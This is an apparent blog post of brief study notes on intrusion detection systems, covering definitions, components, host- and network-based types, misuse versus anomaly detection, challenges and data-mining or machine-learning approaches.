Definitions
- Intrusion: any set of activities that attempt to compromise the integrity,confidentiality and availability of a resource.
- Example:
- DoS: attempt to starve a host of resources needed to function correctly.
- Compromises: obtain privilege access to a host by known vulnerabilities.
- Intrusion Detection: the process of identifying and responding to intrusion activities.
Elements of ID
- Primary Assumptions:
- system activities are observable
- normal and intrusive activities have distinct evidence
Components of IDS
- From an algorithmic perspective :
- features - capture intrusion evidences
- models - piece evidences together
- From a system architecture perspective:
- various components - audit data processor, knowledge base, decision engine, alarm generation and responses.
IDS Classification
- Source
- Host-based : detect and examine malicious activity, optimize for monitoring individual hosts, monitor system network activity (e.g. file systems, log files, user actions), integrate the finding several host-based intrusion detection provide unified view of multiple.
- Network-based : deploying sensors at strategic locations (e.g. packet sniffing via tcpdump at routers), inspecting network traffic (watch for violations of protocols and unusual connection patterns), monitoring user activities (look into the data portions of the packets for malicious command sequences).
Detection Mechanisms
- Misuse Detection : it looks for attack signatures in the user's behavior, accuracy is more higher - normal @ intrusive, can't detect new attack.
- Anomaly Detection : it statically analysis user's current sessions, compares then to the profile describing user's normal behavior and report significant deviation to security officer, can detect new attacks.
Challenges of IDS's
- runtime limitations
- specification of detection signatures
- dependency on environment
Potential Solutions
- Data mining : example sequential mining and episode rules
- Machine Learning Techniques : supervised learning and unsupervised learning
- Co-simulation mechanism : integrating the misuse & anomaly techniques, applying a co-simulation mechanism
No comments:
Post a Comment